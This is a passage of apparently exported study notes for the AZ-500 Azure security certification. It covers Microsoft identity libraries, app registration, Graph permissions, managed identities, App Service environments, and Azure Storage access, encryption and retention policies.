        The Microsoft identity platform has two endpoints (v1.0 and v2.0); however, when developing a new application, consider it's highly recommended that you use the v2.0 (default) endpoint to benefit from the latest features and capabilities:

        The Microsoft Authentication Library or MSAL can be used in many application scenarios, including the following:

        • Single-page applications (JavaScript)
        • Web app signing in users
        • Web application signing in a user and calling a web API on behalf of the user
        • Protecting a web API so only authenticated users can access it
        • Web API calling another downstream Web API on behalf of the signed-in user
        • Desktop application calling a web API on behalf of the signed-in user
        • Mobile application calling a web API on behalf of the user who's signed in interactively.
        • Desktop/service daemon application calling web API on behalf of itself

        Languages and frameworks

        Library Supported platforms and frameworks MSAL for Android Android MSAL Angular Single-page apps with Angular and Angular.js frameworks MSAL for iOS and macOS iOS and macOS MSAL Go (Preview) Windows, macOS, Linux MSAL Java Windows, macOS, Linux MSAL.js JavaScript/TypeScript frameworks such as Vue.js, Ember.js, or Durandal.js MSAL.NET .NET Framework, .NET Core, Xamarin Android, Xamarin iOS, Universal Windows Platform MSAL Node Web apps with Express, desktop apps with Electron, Cross-platform console apps MSAL Python Windows, macOS, Linux MSAL React Single-page apps with React and React-based libraries (Next.js, Gatsby.js)

        Migrate apps that use ADAL to MSAL. - Active Directory Authentication Library (ADAL) integrates with the Azure AD for developers (v1.0) endpoint, where MSAL integrates with the Microsoft identity platform. The v1.0 endpoint supports work accounts but not personal accounts. The v2.0 endpoint is unifying Microsoft personal accounts and works accounts into a single authentication system. Additionally, with MSAL, you can also get authentications for Azure AD B2C.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#the-application-model","title":"The Application Model","text":"

        For an identity provider to know that a user has access to a particular app, both the user and the application must be registered with the identity provider. When you register your application with\u00a0Microsoft Entra ID, you're providing an identity configuration for your application that allows it to integrate with the Microsoft identity platform. Registering the app also allows you to:

        • Customize the branding of your application in the sign-in dialog box.
        • Decide if you want to allow users to sign in only if they belong to your organization. This architecture is known as a single-tenant application. Or, you can allow users to sign in by using any work or school account, which is known as a multi-tenant application.
        • Request scope permissions. For example, you can request the \"user.read\" scope, which grants permission to read the profile of the signed-in user.
        • Define scopes that define access to your web\u00a0application programming interface (API).
        • Share a secret with the Microsoft identity platform that proves the app's identity.

        After the app is registered, it's given a unique identifier that it shares with the Microsoft identity platform when it requests tokens. If the app is a confidential client application, it will also share the secret or the public key depending on whether certificates or secrets were used. The Microsoft identity platform represents applications by using a model that fulfills two main functions:

        • Identify the app by the authentication protocols it supports.
        • Provide all the identifiers,\u00a0Uniform Resource Locators (URLs), secrets, and related information that are needed to authenticate.

        The Microsoft identity platform:

        • Holds all the data required to support authentication at runtime.
        • Holds all the data for deciding what resources an app might need to access, and under what circumstances a given request should be fulfilled.
        • Provides infrastructure for implementing app provisioning within the app developer's tenant, and to any other Microsoft Entra tenant.
        • Handles user consent during token request time and facilitates the dynamic provisioning of apps across tenants.

        Flow in multi-tenant apps

        In this provisioning flow:

        1. A user from tenant B attempts to sign in with the app. The authorization endpoint requests a token for the application.
        2. The user credentials are acquired and verified for authentication.
        3. The user is prompted to provide consent for the app to gain access to tenant B.
        4. The Microsoft identity platform uses the application object in tenant A as a blueprint for creating a service principal in tenant B.
        5. The user receives the requested token.

        You can repeat this process for more tenants. Tenant A retains the blueprint for the\u00a0app (application object). Users and admins of all the other tenants where the app is given consent keep control over what the application is allowed to do via the corresponding service principal object in each tenant.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#22-register-an-application-with-app-registration","title":"2.2. Register an application with App Registration","text":"

        Before your app can get a token from the Microsoft identity platform, it must be registered in the Azure portal. Registration integrates your app with the Microsoft identity platform and establishes the information that it uses to get tokens, including:

        • Application ID: A unique identifier assigned by the Microsoft identity platform.
        • Redirect URI/URL: One or more endpoints at which your app will receive responses from the Microsoft identity platform. (For native and mobile apps, this is a URI assigned by the Microsoft identity platform.)
        • Application Secret: A password or a public/private key pair that your app uses to authenticate with the Microsoft identity platform. (Not needed for native or mobile apps.)

        Like most developers, you will probably use authentication libraries to manage your token interactions with the Microsoft identity platform. Authentication libraries abstract many protocol details, like validation, cookie handling, token caching, and maintaining secure connections, away from the developer and let you focus your development on your app. Microsoft publishes open-source client libraries and server middleware.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#23-configure-microsoft-graph-permissions","title":"2.3. Configure Microsoft Graph permissions","text":"

        Microsoft Graph exposes granular permissions that control the access that apps have to resources, like users, groups, and mail.

        Microsoft Graph has two types of permissions:

        • Delegated permissions\u00a0are used by apps that have a signed-in user present. For these apps, either the user or an administrator consents to the permissions that the app requests, and the app can act as the signed-in user when making calls to Microsoft Graph. Some delegated permissions can be consented by non-administrative users, but some higher-privileged permissions require administrator consent.
        • Application permissions\u00a0are used by apps that run without a signed-in user present; for example, apps that run as background services or daemons. Application permissions can only be consented by an administrator.

        Effective permissions are the permissions that your app will have when making requests to Microsoft Graph. It is important to understand the difference between the delegated and application permissions that your app is granted and its effective permissions when making calls to Microsoft Graph.

        For example, assume your app has been granted the User.ReadWrite.All delegated permission. This permission nominally grants your app permission to read and update the profile of every user in an organization. If the signed-in user is a global administrator, your app will be able to update the profile of every user in the organization. However, if the signed-in user is not in an administrator role, your app will be able to update only the profile of the signed-in user

        Microsoft Graph API. - \u00a0The Microsoft Graph Security API is an intermediary service (or broker) that provides a single programmatic interface to connect multiple Microsoft Graph Security providers (also called security providers or providers). The Microsoft Graph Security API federates requests to all providers in the Microsoft Graph Security ecosystem.

        The following is a description of the flow:

        1. The application user signs in to the provider application to view the consent form from the provider. This consent form experience or UI is owned by the provider and applies to non-Microsoft providers only to get explicit consent from their customers to send requests to Microsoft Graph Security API.
        2. The client consent is stored on the provider side.
        3. The provider consent service calls the Microsoft Graph Security API to inform consent approval for the respective customer.
        4. The application sends a request to the Microsoft Graph Security API.
        5. The Microsoft Graph Security API checks for the consent information for this customer mapped to various providers.
        6. The Microsoft Graph Security API calls all those providers the customer has given explicit consent to via the provider consent experience.
        7. The response is returned from all the consented providers for that client.
        8. The result set response is returned to the application.
        9. If the customer has not consented to any provider, no results from those providers are included in the response.

        Why use the Microsoft Graph Security API?

        • Write code \u2013 Find code samples in C#, Java, NodeJS, and more.
        • Connect using scripts \u2013 Find PowerShell samples.
        • Drag and drop into workflows and playbooks \u2013 Use Microsoft Graph Security connectors for Azure Logic Apps, Microsoft Flow, and PowerApps.
        • Get data into reports and dashboards \u2013 Use the Microsoft Graph Security connector for Power BI.
        • Connect using Jupyter notebooks \u2013 Find Jupyter notebook samples.
        • Unify and standardize alert tracking: Connect once to integrate alerts from any Microsoft Graph-integrated security solution and keep alert status and assignments in sync across all solutions. You can also stream alerts to security information and event management (SIEM) solutions, such as Splunk using Microsoft Graph Security API connectors.
        • Correlate security alerts to improve threat protection and response: Correlate alerts across security solutions more easily with a unified alert schema.
        • Update alert tags, status, and assignments: Tag alerts with additional context or threat intelligence to inform response and remediation. Ensure that comments and feedback on alerts are captured for visibility to all workflows. Keep alert status and assignments in sync so that all integrated solutions reflect the current state. Use webhook subscriptions to get notified of changes.
        • Unlock security context to drive investigation: Dive deep into related security-relevant inventory (like users, hosts, and apps), then add organizational context from other Microsoft Graph providers (Microsoft Entra ID, Microsoft Intune, Microsoft 365) to bring business and security contexts together and improve threat response.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#24-enable-managed-identities","title":"2.4. Enable managed identities","text":"

        Managed Identities\u00a0for Azure resources is the new name for the service formerly known as Managed Service Identity (MSI) for Azure resources feature in Microsoft Entra provides Azure services with an automatically managed identity in Microsoft Entra ID. You can use the identity to authenticate to any service that supports Microsoft Entra authentication, including Key Vault, without any credentials in your code. The managed identities for Azure resources feature is free with Microsoft Entra ID for Azure subscriptions. There's no additional cost.

        Terminology. - The following terms are used throughout the managed identities for Azure resources documentation set:

        • Client ID\u00a0- a unique identifier generated by Microsoft Entra ID that is tied to an application and service principal during its initial provisioning.
        • Principal ID\u00a0- the object ID of the service principal object for your managed identity that is used to grant role-based access to an Azure resource.
        • Azure Instance Metadata Service (IMDS)\u00a0- a REST endpoint accessible to all IaaS VMs created via the Azure Resource Manager. The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from within the VM.

        How managed identities for Azure resources works. - There are two types of managed identities:

        • A system-assigned managed identity\u00a0is enabled directly on an Azure service instance. When the identity is enabled, Azure creates an identity for the instance in the Microsoft Entra tenant that's trusted by the subscription of the instance. After the identity is created, the credentials are provisioned onto the instance. The lifecycle of a system-assigned identity is directly tied to the Azure service instance that it's enabled on. If the instance is deleted, Azure automatically cleans up the credentials and the identity in Microsoft Entra ID.
        • A user-assigned managed identity\u00a0is created as a standalone Azure resource. Through a create process, Azure creates an identity in the Microsoft Entra tenant that's trusted by the subscription in use. After the identity is created, the identity can be assigned to one or more Azure service instances. The lifecycle of a user-assigned identity is managed separately from the lifecycle of the Azure service instances to which it's assigned.

        The following table shows the differences between the two types of managed identities:

        Property System-assigned managed identity User-assigned managed identity Creation Created as part of an Azure resource (for example, Azure Virtual Machines or Azure App Service). Created as a stand-alone Azure resource. Life cycle Shared life cycle with the Azure resource that the managed identity is created with. When the parent resource is deleted, the managed identity is deleted as well. Independent life cycle. Must be explicitly deleted. Sharing across Azure resources Can\u2019t be shared. It can only be associated with a single Azure resource. Can be shared. The same user-assigned managed identity can be associated with more than one Azure resource. Common use cases Workloads contained within a single Azure resource. Workloads needing independent identities. For example, an application that runs on a single virtual machine. Workloads that run on multiple resources and can share a single identity. Workloads needing pre-authorization to a secure resource, as part of a provisioning flow. Workloads where resources are recycled frequently, but permissions should stay consistent. For example, a workload where multiple virtual machines need to access the same resource.

        Credential rotation. - Credential rotation is controlled by the resource provider that hosts the Azure resource. The default rotation of the credential occurs every 46 days. It's up to the resource provider to call for new credentials, so the resource provider could wait longer than 46 days. The following diagram shows how managed service identities work with Azure virtual machines (VMs):

        1. Azure Resource Manager receives a request to enable the system-assigned managed identity on a VM.
        2. Azure Resource Manager creates a service principal in Microsoft Entra ID for the identity of the VM. The service principal is created in the Microsoft Entra tenant that's trusted by the subscription.
        3. Azure Resource Manager configures the identity on the VM by updating the Azure Instance Metadata Service identity endpoint with the service principal client ID and certificate.
        4. After the VM has an identity, use the service principal information to grant the VM access to Azure resources. To call Azure Resource Manager, use role-based access control (RBAC) in Microsoft Entra ID to assign the appropriate role to the VM service principal. To call Key Vault, grant your code access to the specific secret or key in Key Vault.
        5. Your code that's running on the VM can request a token from the Azure Instance Metadata service endpoint, accessible only from within the VM:\u00a0http://169.254.169.254/metadata/identity/oauth2/token
          • The resource parameter specifies the service to which the token is sent. To authenticate to Azure Resource Manager, use resource=https://management.azure.com/.
          • API version parameter specifies the IMDS version, use api-version=2018-02-01 or greater.
        6. A call is made to Microsoft Entra ID to request an access token (as specified in step 5) by using the client ID and certificate configured in step 3. Microsoft Entra ID returns a JSON Web Token (JWT) access token.
        7. Your code sends the access token on a call to a service that supports Microsoft Entra authentication
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#25-azure-app-services","title":"2.5. Azure App Services","text":"

        Azure App Service\u00a0is an HTTP-based service for\u00a0hosting web applications,\u00a0REST APIs, and\u00a0mobile backends. You can develop in your favorite language, be it .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python. Applications run and scale with ease on both Windows and Linux-based environments. Azure App Service is a fully managed platform as a service (PaaS) offering for developers. Here are some key features of App Service:

        • Multiple languages and frameworks - App Service has first-class support for ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can also run PowerShell and other scripts or executables as background services.
        • Managed production environment - App Service automatically patches and maintains the OS and language frameworks for you.
        • Containerization and Docker - Dockerize your app and host a custom Windows or Linux container in App Service. Run multi-container apps with Docker Compose.
        • DevOps optimization - Set up continuous integration and deployment with Azure DevOps, GitHub, BitBucket, Docker Hub, or Azure Container Registry.
        • Global scale with high availability - Scale up or out manually or automatically.
        • Connections to SaaS platforms and on-premises data - Choose from more than 50 connectors for enterprise systems (such as SAP), SaaS services (such as Salesforce), and internet services (such as Facebook). Access on-premises data using Hybrid Connections and Azure Virtual Networks.
        • Security and compliance - The App Service is ISO, SOC, and PCI compliant. Authenticate users with Microsoft Entra ID, Google, Facebook, Twitter, or Microsoft account. Create IP address restrictions and manage service identities. Prevent subdomain takeovers.
        • Application templates - Choose from an extensive list of application templates in the Azure Marketplace, such as WordPress, Joomla, and Drupal.
        • Visual Studio and Visual Studio Code integration - Dedicated tools in Visual Studio and Visual Studio Code streamline the work of creating, deploying, and debugging.
        • API and mobile features - App Service provides turn-key CORS support for RESTful API scenarios and simplifies mobile app scenarios by enabling authentication, offline data sync, push notifications, and more.
        • Serverless code - Run a code snippet or script on-demand without having to explicitly provision or manage infrastructure and pay only for the compute time your code actually uses.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#26-app-service-environment","title":"2.6. App Service Environment","text":"

        An\u00a0App Service Environment\u00a0is an Azure App Service feature that provides a fully isolated and dedicated environment for running App Service apps securely at high scale. An App Service Environment can host:

        • Windows web apps
        • Linux web apps
        • Docker containers (Windows\u00a0and\u00a0Linux)
        • Functions
        • Logic apps (Standard)

        App Service Environments have many use cases, including:

        • Internal line-of-business applications.
        • Applications that need more than 30 App Service plan instances.
        • Single-tenant systems to satisfy internal compliance or security requirements.
        • Network-isolated application hosting.
        • Multi-tier applications.

        There are many networking features that enable apps in a multi-tenant App Service to reach network-isolated resources or become network-isolated themselves. These features are enabled at the application level. With an App Service Environment, no added configuration is required for the apps to be on a virtual network. The apps are deployed into a network-isolated environment that's already on a virtual network. If you really need a complete isolation story, you can also deploy your App Service Environment onto dedicated hardware.

        Dedicated environment. - An App Service Environment is a single-tenant deployment of Azure App Service that runs on your virtual network:

        • Applications are hosted in App Service plans (which are a provisioning profile for an application host.)
        • App Service plans are created in an App Service Environment.

        Scaling out an App Service plan: you create more application hosts with all the apps in that App Service plan on each host.

        • A single App Service Environment v3 can have up to 200 total App Service plan instances across all the App Service plans combined.
        • A single App Service Isolated v2 (Iv2) plan can have up to 100 instances by itself.
        • When you're deploying onto dedicated hardware (hosts), you're limited in scaling across all App Service plans to the number of cores in this type of environment. An App Service Environment that's deployed on dedicated hosts has 132 vCores available. I1v2 uses two vCores, I2v2 uses four vCores, and I3v2 uses eight vCores per instance.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#27-azure-app-service-plan","title":"2.7. Azure App Service plan","text":"

        An app service always runs in an\u00a0App Service plan. In addition, Azure Functions also has the option of running in an App Service plan. An App Service plan defines a set of compute resources for a web app to run. These compute resources are analogous to the server farm in conventional web hosting. One or more apps can be configured to run on the same computing resources (or in the same App Service plan).

        Each App Service plan defines:

        • Operating System (Windows, Linux)
        • Region (West US, East US, etc.)
        • Number of VM instances
        • Size of VM instances (Small, Medium, Large)
        • Pricing tier (Free, Shared, Basic, Standard, Premium, PremiumV2, PremiumV3, Isolated, IsolatedV2). This determines what App Service features you get and how much you pay for the plan.

        When you create an App Service plan in a certain region (for example, West Europe), a set of compute resources is created for that plan in that region. Whatever apps you put into this App Service plan run on these compute resources as defined by your App Service plan.

        The pricing tiers available to your App Service plan depend on the operating system selected at creation time. There are a few categories of pricing tiers:

        • Shared compute: Free and Shared, the two base tiers, runs an app on the same Azure VM as other App Service apps, including apps of other customers. These tiers allocate CPU quotas to each app that runs on the shared resources, and the resources cannot scale out.
        • Dedicated compute: The Basic, Standard, Premium, PremiumV2, and PremiumV3 tiers run apps on dedicated Azure VMs. Only apps in the same App Service plan share the same compute resources. The higher the tier, the more VM instances are available to you for scale-out.
        • Isolated: This Isolated and IsolatedV2 tiers run dedicated Azure VMs on dedicated Azure Virtual Networks. It provides network isolation on top of compute isolation to your apps. It provides the maximum scale-out capabilities.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#28-app-service-environment-networking","title":"2.8. App Service Environment networking","text":"

        App Service Environment is a single-tenant deployment of Azure App Service that hosts Windows and Linux containers, web apps, API apps, logic apps, and function apps. When you install an App Service Environment, you pick the Azure virtual network that you want it to be deployed in. All of the inbound and outbound application traffic is inside the virtual network you specify. You deploy into a single subnet in your virtual network, and nothing else can be deployed into that subnet.

        Subnet requirements. - You must delegate the subnet to Microsoft.Web/hostingEnvironments, and the subnet must be empty. The size of the subnet can affect the scaling limits of the App Service plan instances within the App Service Environment. It's a good idea to use a /24 address space (256 addresses) for your subnet to ensure enough addresses to support production scale.

        Windows Containers uses an additional IP address per app for each App Service plan instance, and you need to size the subnet accordingly. If your App Service Environment has, for example, 2 Windows Container App Service plans, each with 25 instances and each with 5 apps running, you will need 300 IP addresses and additional addresses to support horizontal (up/down) scale.

        The minimal size of your subnet is a /27 address space (32 addresses). Any particular subnet has five addresses reserved for management purposes. In addition to the management addresses, App Service Environment dynamically scales the supporting infrastructure and uses between 4 and 27 addresses, depending on the configuration and load. You can use the remaining addresses for instances in the App Service plan.

        If you run out of addresses within your subnet, you can be restricted from scaling out your App Service plans in the App Service Environment. Another possibility is that you can experience increased latency during intensive traffic load if Microsoft can't scale the supporting infrastructure.

        App Service Environment has the following network information at creation:

        Address type Description App Service Environment virtual network The virtual network deployed into. App Service Environment subnet The subnet deployed into. Domain suffix The domain suffix that is used by the apps made. Virtual IP (VIP) The VIP type is used. The two possible values are internal and external. Inbound address The inbound address is the address at which your apps are reached. If you have an internal VIP, it's an address in your App Service Environment subnet. If the address is external, it's a public-facing address. Default outbound addresses The apps use this address, by default, when making outbound calls to the internet.

        As you scale your App Service plans in your App Service Environment, you'll use more addresses from your subnet. Apps in the App Service Environment don't have dedicated addresses in the subnet. The specific addresses an app uses in the subnet will change over time.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#29-availability-zone-support-for-app-service-environments","title":"2.9. Availability Zone Support for App Service Environments","text":"

        Azure App Service Environment can be deployed across\u00a0availability zones (AZ)\u00a0to help you achieve resiliency and reliability for your business-critical workloads. This architecture is also known as zone redundancy.

        When you configure it to be zone redundant, the platform automatically spreads the instances of the Azure App Service plan across three zones in the selected region. This means that the minimum App Service Plan instance count will always be three. If you specify a capacity larger than three, and the number of instances is divisible by three, the instances are spread evenly. Otherwise,\u00a0instance counts beyond 3*N\u00a0are spread across the remaining one or two zones.

        • You configure availability zones when you create your App Service Environment.
        • You can only specify availability zones when creating a new App Service Environment, not later.
        • Availability zones are\u00a0only supported in a subset of regions.

        Since you can't convert pre-existing App Service Environments to use availability zones, migration will consist of a side-by-side deployment where you'll create a new App Service Environment with availability zones enabled. For more information on App Service Environment migration options, see App Service Environment migration.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#210-app-service-environment-certificates","title":"2.10. App Service Environment Certificates","text":"

        Azure App Service\u00a0provides a highly scalable, self-patching web hosting service. Once the certificate is added to your App Service app or function app, you can secure a\u00a0custom Domain Name System (DNS)\u00a0name with it or use it in your application code.

        A certificate uploaded into an app is stored in a deployment unit that is bound to the app service plan's resource group and region combination (internally called a webspace). This makes the certificate accessible to other apps in the same resource group and region combination.

        The following lists are options for adding certificates in App Service:

        • Create a free App Service managed certificate: A private certificate that's free of charge and easy to use if you just need to secure your custom domain in App Service.
        • Purchase an App Service certificate: A private certificate that's managed by Azure. It combines the simplicity of automated certificate management and the flexibility of renewal and export options.
        • Import a certificate from Key Vault: Useful if you use Azure Key Vault to manage your\u00a0Public-Key Cryptography Standards #12 (PKCS12)\u00a0certificates.
        • Upload a private certificate: If you already have a private certificate from a third-party provider, you can upload it.
        • Upload a public certificate: Public certificates are not used to secure custom domains, but you can load them into your code if you need them to access remote resources.

        **Prerequisites: **

        • Create an App Service app.
        • For a private certificate, make sure that it satisfies all requirements from App Service.
        • Free certificate only:
          • Map the domain you want a certificate for to App Service.
          • For a root domain (like contoso.com), make sure your app doesn't have any IP restrictions configured. Both certificate creation and its periodic renewal for a root domain depends on your app being reachable from the internet.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#3-storage-security","title":"3. Storage Security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#31-data-sovereignty","title":"3.1. Data sovereignty","text":"

        Data sovereignty is the concept that information, which has been converted and stored in binary digital form, is subject to the laws of the country or region in which it is located. We recommend that you configure business continuity and disaster recovery (BCDR) across regional pairs to benefit from Azure\u2019s isolation and VM policies.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#32-configure-azure-storage-access","title":"3.2. Configure Azure storage access","text":"

        Options for authorizing requests to Azure Storage include:

        • Microsoft Entra ID\u00a0- Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. When you use Microsoft Entra ID to authorize requests make from your applications, you avoid having to store your account access key with your code, as you do with Shared Key authorization. While you can continue to use Shared Key authorization with your blob and queue applications, Microsoft recommends moving to Microsoft Entra ID where possible.
        • Microsoft Entra Domain Services authorization\u00a0for Azure Files. Azure Files supports identity-based authorization over Server Message Block (SMB) through Microsoft Entra Domain Services. You can use RBAC for fine-grained control over a client's access to Azure Files resources in a storage account
        • Shared Key\u00a0- Shared Key authorization relies on your account access keys and other parameters to produce an encrypted signature string that is passed on via the request in the Authorization header.
        • Shared Access Signatures\u00a0- A shared access signature (SAS) is a URI that grants restricted access rights to Azure Storage resources. You can provide a shared access signature to clients who should not be trusted with your storage account key but to whom you wish to delegate access to certain storage account resources. By distributing a shared access signature URI to these clients, you can grant them access to a resource for a specified period of time, with a specified set of permissions. The URI query parameters comprising the SAS token incorporate all of the information necessary to grant controlled access to a storage resource. A client who is in possession of the SAS can make a request against Azure Storage with just the SAS URI, and the information contained in the SAS token is used to authorize the request.
        • Anonymous access to containers and blobs\u00a0- You can enable anonymous, public read access to a container and its blobs in Azure Blob storage. By doing so, you can grant read-only access to these resources without sharing your account key, and without requiring a shared access signature (SAS).
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#33-deploy-shared-access-signatures","title":"3.3. Deploy shared access signatures","text":"

        As a best practice, you shouldn't share storage account keys with external third-party applications. For untrusted clients, use a\u00a0shared access signature\u00a0(SAS).

        A shared access signature is a string that contains a security token that can be attached to a URI. Use a shared access signature to delegate access to storage objects and specify constraints, such as the permissions and the time range of access.

        -\u00a0Service-level\u00a0shared access signature allows access to specific resources in a storage account. You'd use this type of shared access signature, for example, to allow an app to retrieve a list of files in a file system or to download a file. It is used to delegate access to a resource in either Blob storage, Queue storage, Table storage, or Azure Files. - Account-level\u00a0shared access signature allows access to anything that a service-level shared access signature can allow, plus additional resources and abilities. For example, you can use an account-level shared access signature to allow the ability to create file systems. - User delegation SAS, introduced with version 2018-11-09, is secured with Microsoft Entra credentials. This type of SAS is supported for the Blob service only and can be used to grant access to containers and blobs.

        One would typically use a shared access signature for a service where users read and write their data to your storage account. Accounts that store user data have two typical designs:

        • Clients upload and download data through a front-end proxy service, which performs authentication. This front-end proxy service has the advantage of allowing validation of business rules. But if the service must handle large amounts of data or high-volume transactions, you might find it complicated or expensive to scale this service to match demand.

        • A lightweight service authenticates the client as needed. Then it generates a shared access signature. After receiving the shared access signature, the client can access storage account resources directly. The shared access signature defines the client's permissions and access interval. The shared access signature reduces the need to route all data through the front-end proxy service.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#34-manage-microsoft-entra-storage-authentication","title":"3.4. Manage Microsoft Entra storage authentication","text":"

        Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. With Microsoft Entra ID, you can use Azure role-based access control (Azure RBAC) to grant permissions to a security principal, which may be a user, group, or application service principal. The security principal is authenticated by Microsoft Entra ID to return an OAuth 2.0 token. The token can then be used to authorize a request against the Blob service.

        Authorization with Microsoft Entra ID is available for all general-purpose and Blob storage accounts in all public regions and national clouds. Only storage accounts created with the Azure Resource Manager deployment model support Microsoft Entra authorization. Blob storage additionally supports creating shared access signatures (SAS) that is signed with Microsoft Entra credentials.

        When a security principal (a user, group, or application) attempts to access a queue resource, the request must be authorized. With Microsoft Entra ID, access to a resource is a two-step process. First, the security principal's identity is authenticated, and an OAuth 2.0 token is returned. Next, the token is passed as part of a request to the Queue service and used by the service to authorize access to the specified resource. The authentication step requires that an application request an OAuth 2.0 access token at runtime. If an application is running from within an Azure entity, such as an Azure VM, a Virtual Machine Scale Set, or an Azure Functions app, it can use a managed identity to access queues.

        The authorization step requires one or more Azure roles to be assigned to the security principal. Native and web applications that request the Azure Queue service can also authorize access with Microsoft Entra ID.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#35-implement-storage-service-encryption","title":"3.5. Implement storage service encryption","text":"
        • All data (including metadata) written to Azure Storage is automatically encrypted using Storage Service Encryption (SSE).
        • Microsoft Entra ID and Role-Based Access Control (RBAC) are supported for Azure Storage for both resource management operations and data operations, as follows:
          • You can assign RBAC roles scoped to the storage account to security principals and use Microsoft Entra ID to authorize resource management operations such as key management.
          • Microsoft Entra integration is supported for blob and queue data operations. You can assign RBAC roles scoped to a subscription, resource group, storage account, or an individual container or queue to a security principal or a managed identity for Azure resources.
        • Data can be secured in transit between an application and Azure by using Client-Side Encryption, HTTPS, or SMB 3.0.
        • OS and data disks used by Azure virtual machines can be encrypted using Azure Disk Encryption.
        • Delegated access to the data objects in Azure Storage can be granted using a shared access signature.

        Azure Storage Service Encryption (SSE) for data at rest. -

        • When a new storage account is provisioned, Azure Storage Encryption is automatically enabled for it and it cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. All object metadata is also encrypted.
        • Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant.
        • Azure Storage encryption is similar to BitLocker encryption on Windows.
        • Encryption does not affect Azure Storage performance. There is no additional cost for Azure Storage encryption.

        Encryption key management

        You can rely on Microsoft-managed keys for the encryption of your storage account, or you can manage encryption with your own keys. If you choose to manage encryption with your own keys, you have two options:

        • You can specify a\u00a0customer-managed\u00a0key to use for encrypting and decrypting all data in the storage account. A customer-managed key is used to encrypt all data in all services in your storage account.
        • You can specify a\u00a0customer-provided\u00a0key on Blob storage operations. A client making a read or write request against Blob storage can include an encryption key on the request for granular control over how blob data is encrypted and decrypted.

        The following table compares key management options for Azure Storage encryption.

        Microsoft-managed keys Customer-managed keys Customer-provided keys Encryption/decryption operations Azure Azure Azure Azure Storage services supported All Blob storage, Azure Files Blob storage Key storage Microsoft key store Azure Key Vault Azure Key Vault or any other key store Key rotation responsibility Microsoft Customer Customer Key usage Microsoft Azure portal, Storage Resource Provider REST API, Azure Storage management libraries, PowerShell, CLI Azure Storage REST API (Blob storage), Azure Storage client libraries Key access Microsoft only Microsoft, Customer Customer only","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#36-configure-blob-data-retention-policies","title":"3.6. Configure blob data retention policies","text":"

        *Immutable storage in Azure blob storage:

        Immutable storage for Azure Blob storage enables users to store business-critical data objects in a WORM (Write Once, Read Many) state. Immutable storage is available for general-purpose v2 and Blob storage accounts in all Azure regions.

        Time-based retention policy support: Users can set policies to store data for a specified interval. When a time-based retention policy is set, blobs can be created and read, but not modified or deleted. After the retention period has expired, blobs can be deleted but not overwritten. When a time-based retention policy is applied on a container, all blobs in the container will stay in the immutable state for the duration of the effective retention period. The effective retention period for blobs is equal to the difference between the blob's creation time and the user-specified retention interval. Because users can extend the retention interval, immutable storage uses the most recent value of the user-specified retention interval to calculate the effective retention period.

        Legal hold policy support: If the retention interval is not known, users can set legal holds to store immutable data until the legal hold is cleared. When a legal hold policy is set, blobs can be created and read, but not modified or deleted. Each legal hold is associated with a user-defined alphanumeric tag (such as a case ID, event name, etc.) that is used as an identifier string. Legal holds are temporary holds that can be used for legal investigation purposes or general protection policies. Each legal hold policy needs to be associated with one or more tags. Tags are used as a named identifier, such as a case ID or event, to categorize and describe the purpose of the hold.

        Support for all blob tiers: WORM policies are independent of the Azure Blob storage tier and apply to all the tiers: hot, cool, and archive. Users can transition data to the most cost-optimized tier for their workloads while maintaining data immutability.

        Container-level configuration: Users can configure time-based retention policies and legal hold tags at the container level. By using simple container-level settings, users can create and lock time-based retention policies, extend retention intervals, set and clear legal holds, and more. These policies apply to all the blobs in the container, both existing and new.

        Audit logging support: Each container includes a policy audit log. It shows up to seven time-based retention commands for locked time-based retention policies and contains the user ID, command type, time stamps, and retention interval. For legal holds, the log contains the user ID, command type, time stamps, and legal hold tags. This log is retained for the lifetime of the policy, in accordance with the SEC 17a-4(f) regulatory guidelines. The Azure Activity Log shows a more comprehensive log of all the control plane activities; while enabling Azure Resource Logs retains and shows data plane operations. It is the user's responsibility to store those logs persistently, as might be required for regulatory or other purposes.

        A container can have both a legal hold and a time-based retention policy at the same time. All blobs in that container stay in the immutable state until all legal holds are cleared, even if their effective retention period has expired. Conversely, a blob stays in an immutable state until the effective retention period expires, even though all legal holds have been cleared.

